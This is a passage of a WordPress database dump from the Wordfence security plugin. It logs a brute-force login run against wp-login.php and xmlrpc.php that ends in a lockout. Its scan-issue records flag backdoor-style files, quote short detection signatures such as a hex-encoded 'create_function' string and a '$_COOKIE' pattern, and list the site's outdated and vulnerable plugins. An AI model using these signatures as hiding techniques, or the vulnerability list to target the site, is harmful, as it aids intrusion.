Safari/537.36','loginFailValidUsername',NULL,NULL),(8581,0.000000,1629744942.842305,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8582,0.000000,1629747553.921805,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','loginFailValidUsername',NULL,NULL),(8583,0.000000,1629750586.111272,'\0\0\0\0\0\0\0\0\0\0���!',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','loginFailValidUsername',NULL,NULL),(8584,0.000000,1629752042.703340,'\0\0\0\0\0\0\0\0\0\0���wң',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','loginFailValidUsername',NULL,NULL),(8585,0.000000,1629753491.165146,'\0\0\0\0\0\0\0\0\0\0���\rKz',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(8586,0.000000,1629754701.166696,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8587,0.000000,1629754704.203154,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8588,0.000000,1629754706.177265,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8589,0.000000,1629754707.651149,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8590,0.000000,1629754709.447063,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8591,0.000000,1629754713.162284,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8592,0.000000,1629754716.780257,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8593,0.000000,1629754720.805534,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8594,0.000000,1629754724.048184,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8595,0.000000,1629754727.711526,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8596,0.000000,1629754731.228752,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8597,0.000000,1629754736.821193,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8598,0.000000,1629754740.115979,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8599,0.000000,1629754743.492214,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8600,0.000000,1629754747.255050,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8601,0.000000,1629754750.020384,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8602,0.000000,1629754751.337765,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8603,0.000000,1629754752.445138,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(8604,0.000000,1629754753.787888,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(8605,0.000000,1629754936.815190,'\0\0\0\0\0\0\0\0\0\0��Ϛ�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','loginFailValidUsername',NULL,NULL),(8606,0.000000,1629756775.784470,'\0\0\0\0\0\0\0\0\0\0��gF�E',0,302,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','https://teethwhiteningproduct.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fteethwhiteningproduct.co.uk%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','loginOK',NULL,NULL);
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfhoover`
--
DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`owner` text DEFAULT NULL,
`host` text DEFAULT NULL,
`path` text DEFAULT NULL,
`hostKey` varbinary(124) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfhoover`
--
LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfissues`
--
DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`time` int(10) unsigned NOT NULL,
`lastUpdated` int(10) unsigned NOT NULL,
`status` varchar(10) NOT NULL,
`type` varchar(20) NOT NULL,
`severity` tinyint(3) unsigned NOT NULL,
`ignoreP` char(32) NOT NULL,
`ignoreC` char(32) NOT NULL,
`shortMsg` varchar(255) NOT NULL,
`longMsg` text DEFAULT NULL,
`data` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lastUpdated` (`lastUpdated`),
KEY `status` (`status`),
KEY `ignoreP` (`ignoreP`),
KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=1243 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfissues`
--
LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (1207,1629680883,1629680883,'new','skippedPaths',25,'6fd0d290b978eab8027e6b79501ac149','6fd0d290b978eab8027e6b79501ac149','1 path was skipped for the malware scan due to scan settings','The option \"Scan files outside your WordPress installation\" is off by default, which means 1 path and its file(s) will not be scanned for malware or unauthorized changes. To continue skipping this path, you may ignore this issue. Or to start scanning it, enable the option and subsequent scans will include it. Some paths may not be necessary to scan, so this is optional. <a href=\"https://www.wordfence.com/help/?query=scan-result-skipped-paths\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a><br><br>The path skipped is ~/images','a:0:{}'),(1208,1629680903,1629680903,'new','knownfile',75,'91c6033bcbd5703bb875f9ca27504cf6','9e6d341d68cc41056c7b518ce22b7e32','Unknown file in WordPress core: wp-admin/js/index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:21:\"wp-admin/js/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(1209,1629681057,1629681057,'new','file',100,'4b283f62252bb89d092f0040a8d2a97c','048d307c6f9bcb3800c0380c43308841','File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">"\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e"</strong> <br><br>The issue type is: <strong>Suspicious:PHP/hexcreatefn.6023</strong><br>Description: <strong>Suspicious code often used to hide a backdoor</strong>','a:9:{s:4:\"file\";s:73:\"wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php\";s:4:\"shac\";s:64:\"E4D02A1FBFD196CDFEDCF532B66EDDC1C18D498C04B2E1FB6272F41BE082E4EC\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1210,1629681057,1629681057,'new','file',100,'121414d3833042e8fc2270b44b77e0cb','048d307c6f9bcb3800c0380c43308841','File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">"\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e"</strong> <br><br>The issue type is: <strong>Suspicious:PHP/hexcreatefn.6023</strong><br>Description: <strong>Suspicious code often used to hide a backdoor</strong>','a:9:{s:4:\"file\";s:81:\"wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php\";s:4:\"shac\";s:64:\"E4D02A1FBFD196CDFEDCF532B66EDDC1C18D498C04B2E1FB6272F41BE082E4EC\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1211,1629681057,1629681057,'new','file',100,'9b965a0ce4bd5fccc603f22f75ab7663','048d307c6f9bcb3800c0380c43308841','File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">"\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e"</strong> <br><br>The issue type is: <strong>Suspicious:PHP/hexcreatefn.6023</strong><br>Description: <strong>Suspicious code often used to hide a backdoor</strong>','a:9:{s:4:\"file\";s:73:\"wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php\";s:4:\"shac\";s:64:\"E4D02A1FBFD196CDFEDCF532B66EDDC1C18D498C04B2E1FB6272F41BE082E4EC\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1212,1629681057,1629681057,'new','file',100,'30d6f4dc2ddddee3ad0bd9faaf87e8d9','a9b9af2e99a77e543690248dcc35d6f3','File appears to be malicious or unsafe: wp-admin/js/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">$_COOKIE;(count($</strong> <br><br>The issue type is: <strong>Backdoor:PHP/cookie.count.10422</strong><br>Description: <strong>Code often seen in file managers and backdoors.</strong>','a:9:{s:4:\"file\";s:21:\"wp-admin/js/index.php\";s:4:\"shac\";s:64:\"E0879C71CA8ACAA7E6770085D8DFADE02A63673128DDE07F378CFA5C9E9A3574\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1228,1629717530,1629717530,'new','wfUpgrade',75,'4215230377354b899cb8bd1b0ba04441','4215230377354b899cb8bd1b0ba04441','Your WordPress version is out of date','WordPress version 5.8 is now available. Please upgrade immediately to get the latest security updates from WordPress.','a:2:{s:14:\"currentVersion\";s:5:\"5.7.2\";s:10:\"newVersion\";s:3:\"5.8\";}'),(1229,1629717530,1629717530,'new','wfPluginUpgrade',50,'12233d4d5d583f164be52ae2067b073d','12233d4d5d583f164be52ae2067b073d','The Plugin \"Akismet Anti-Spam\" needs an upgrade (4.1.9 -> 4.1.10).','You need to upgrade \"Akismet Anti-Spam\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:17:\"Akismet Anti-Spam\";s:9:\"PluginURI\";s:20:\"https://akismet.com/\";s:7:\"Version\";s:5:\"4.1.9\";s:11:\"Description\";s:363:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. <cite>By <a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>.</cite>\";s:6:\"Author\";s:66:\"<a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>\";s:9:\"AuthorURI\";s:41:\"https://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:7:\"akismet\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:52:\"<a href=\"https://akismet.com/\">Akismet Anti-Spam</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:84:\"/home/teethwhiteningproduct.co.uk/public_html/wp-content/plugins/akismet/akismet.php\";s:10:\"newVersion\";s:6:\"4.1.10\";s:4:\"slug\";s:7:\"akismet\";s:5:\"wpURL\";s:37:\"https://wordpress.org/plugins/akismet\";s:10:\"vulnerable\";b:0;}'),(1230,1629717530,1629717530,'new','wfPluginUpgrade',50,'30c01613c7a298e1b019aa670784cd97','30c01613c7a298e1b019aa670784cd97','The Plugin \"All In One WP Security\" needs an upgrade (4.4.8 -> 4.4.9).','You need to upgrade \"All In One WP Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:22:\"All In One WP Security\";s:9:\"PluginURI\";s:71:\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\";s:7:\"Version\";s:5:\"4.4.8\";s:11:\"Description\";s:153:\"All round best WordPress security plugin! <cite>By <a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>.</cite>\";s:6:\"Author\";s:94:\"<a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>\";s:9:\"AuthorURI\";s:33:\"https://www.tipsandtricks-hq.com/\";s:10:\"TextDomain\";s:35:\"all-in-one-wp-security-and-firewall\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:108:\"<a href=\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\">All In One WP Security</a>\";s:10:\"AuthorName\";s:46:\"Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy\";s:10:\"pluginFile\";s:116:\"/home/teethwhiteningproduct.co.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php\";s:10:\"newVersion\";s:5:\"4.4.9\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"wpURL\";s:65:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall\";s:10:\"vulnerable\";b:0;}'),(1231,1629717530,1629717530,'new','wfPluginUpgrade',50,'14a8633fcd370fce0e65893e128f3362','14a8633fcd370fce0e65893e128f3362','The Plugin \"Disable Gutenberg\" needs an upgrade (2.5 -> 2.5.1).','You need to upgrade \"Disable Gutenberg\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:17:\"Disable Gutenberg\";s:9:\"PluginURI\";s:46:\"https://perishablepress.com/disable-gutenberg/\";s:7:\"Version\";s:3:\"2.5\";s:11:\"Description\";s:236:\"Disables Gutenberg Block Editor and restores the Classic Editor and original Edit Post screen. Provides options to enable on specific post types, user roles, and more. <cite>By <a href=\"https://plugin-planet.com/\">Jeff Starr</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://plugin-planet.com/\">Jeff Starr</a>\";s:9:\"AuthorURI\";s:26:\"https://plugin-planet.com/\";s:10:\"TextDomain\";s:17:\"disable-gutenberg\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"4.9\";s:11:\"RequiresPHP\";s:6:\"5.6.20\";s:5:\"Title\";s:78:\"<a href=\"https://perishablepress.com/disable-gutenberg/\">Disable Gutenberg</a>\";s:10:\"AuthorName\";s:10:\"Jeff Starr\";s:10:\"pluginFile\";s:104:\"/home/teethwhiteningproduct.co.uk/public_html/wp-content/plugins/disable-gutenberg/disable-gutenberg.php\";s:10:\"newVersion\";s:5:\"2.5.1\";s:4:\"slug\";s:17:\"disable-gutenberg\";s:5:\"wpURL\";s:47:\"https://wordpress.org/plugins/disable-gutenberg\";s:10:\"vulnerable\";b:0;}'),(1232,1629717530,1629717530,'new','wfPluginUpgrade',100,'5657a32c568bf6b898ceb83a525b9292','5657a32c568bf6b898ceb83a525b9292','The Plugin \"Redirection\" needs an upgrade (3.2 -> 5.1.3).','You need to upgrade \"Redirection\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:11:\"Redirection\";s:9:\"PluginURI\";s:23:\"https://redirection.me/\";s:7:\"Version\";s:3:\"3.2\";s:11:\"Description\";s:118:\"Manage all your 301 redirects and monitor 404 errors <cite>By <a href=\"https://johngodley.com\">John Godley</a>.</cite>\";s:6:\"Author\";s:48:\"<a href=\"https://johngodley.com\">John Godley</a>\";s:9:\"AuthorURI\";s:22:\"https://johngodley.com\";s:10:\"TextDomain\";s:11:\"redirection\";s:10:\"DomainPath\";s:7:\"/locale\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:49:\"<a href=\"https://redirection.me/\">Redirection</a>\";s:10:\"AuthorName\";s:11:\"John Godley\";s:10:\"pluginFile\";s:92:\"/home/teethwhiteningproduct.co.uk/public_html/wp-content/plugins/redirection/redirection.php\";s:10:\"newVersion\";s:5:\"5.1.3\";s:4:\"slug\";s:11:\"redirection\";s:5:\"wpURL\";s:41:\"https://wordpress.org/plugins/redirection\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/4209cf3b-1778-4ac2-b778-3bd5526b681d\";}'),(1233,1629717530,1629717530,'new','wfPluginUpgrade',50,'b0c7923ab823f8efa16f6fcf89b7137a','b0c7923ab823f8efa16f6fcf89b7137a','The Plugin \"Wordfence Security\" needs an upgrade (7.5.4 -> 7.5.5).','You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:5:\"7.5.4\";s:11:\"Description\";s:131:\"Wordfence Security – Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>\";s:6:\"Author\";s:49:\"<a href=\"http://www.wordfence.com/\">Wordfence</a>\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:58:\"<a href=\"http://www.wordfence.com/\">Wordfence Security</a>\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:88:\"/home/teethwhiteningproduct.co.uk/public_html/wp-content/plugins/wordfence/wordfence.php\";s:10:\"newVersion\";s:5:\"7.5.5\";s:4:\"slug\";s:9:\"wordfence\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:10:\"vulnerable\";b:0;}'),(1234,1629717530,1629717530,'new','wfPluginUpgrade',100,'f1c3e816ea46b9a9439c5a41628c0409','f1c3e816ea46b9a9439c5a41628c0409','The Plugin \"WP Cerber Security, Anti-spam & Malware Scan\" needs an upgrade (8.8.5 -> 8.9.3).','You need to upgrade \"WP Cerber Security, Anti-spam & Malware Scan\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:48:\"WP Cerber Security, Anti-spam & Malware Scan\";s:9:\"PluginURI\";s:20:\"https://wpcerber.com\";s:7:\"Version\";s:5:\"8.8.5\";s:11:\"Description\";s:408:\"Defends WordPress against hacker attacks, spam, trojans, and viruses. Malware scanner and integrity checker. Hardening WordPress with a set of comprehensive security algorithms. Spam protection with a sophisticated bot detection engine and reCAPTCHA. Tracks user and intruder activity with powerful email, mobile and desktop notifications. <cite>By <a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>\";s:9:\"AuthorURI\";s:20:\"https://wpcerber.com\";s:10:\"TextDomain\";s:9:\"wp-cerber\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:83:\"<a href=\"https://wpcerber.com\">WP Cerber Security, Anti-spam & Malware Scan</a>\";s:10:\"AuthorName\";s:16:\"Cerber Tech Inc.\";s:10:\"pluginFile\";s:88:\"/home/teethwhiteningproduct.co.uk/public_html/wp-content/plugins/wp-cerber/wp-cerber.php\";s:10:\"newVersion\";s:5:\"8.9.3\";s:4:\"slug\";s:9:\"wp-cerber\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wp-cerber\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}'),(1235,1629717530,1629717530,'new','wfThemeUpgrade',50,'d1d15ee3387eb930f5e1b4c9bd54cbea','d1d15ee3387eb930f5e1b4c9bd54cbea','The Theme \"Regina Lite\" needs an upgrade (2.0.0 -> 2.0.7).','You need to upgrade \"Regina Lite\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.0.7\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/regina-lite.2.0.7.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/regina-lite/\";s:4:\"Name\";s:11:\"Regina Lite\";s:4:\"name\";s:11:\"Regina Lite\";s:7:\"version\";s:5:\"2.0.0\";s:10:\"vulnerable\";b:0;}'),(1236,1629717530,1629717530,'new','wfThemeUpgrade',50,'4666b958d6ff765bd15194272a327f80','4666b958d6ff765bd15194272a327f80','The Theme \"SKT Toothy\" needs an upgrade (1.4 -> 1.6).','You need to upgrade \"SKT Toothy\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.6\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/skt-toothy.1.6.zip\";s:3:\"URL\";s:40:\"https://wordpress.org/themes/skt-toothy/\";s:4:\"Name\";s:10:\"SKT Toothy\";s:4:\"name\";s:10:\"SKT Toothy\";s:7:\"version\";s:3:\"1.4\";s:10:\"vulnerable\";b:0;}'),(1237,1629717530,1629717530,'new','wfThemeUpgrade',50,'b1f40133224ebd37d11a57212569e7b7','b1f40133224ebd37d11a57212569e7b7','The Theme \"Twenty Nineteen\" needs an upgrade (2.0 -> 2.1).','You need to upgrade \"Twenty Nineteen\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.1\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.1.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:4:\"Name\";s:15:\"Twenty Nineteen\";s:4:\"name\";s:15:\"Twenty Nineteen\";s:7:\"version\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}'),(1238,1629717530,1629717530,'new','wfThemeUpgrade',50,'b4aa3a5a0b6b6ad3791cccd0ead6da3c','b4aa3a5a0b6b6ad3791cccd0ead6da3c','The Theme \"Twenty 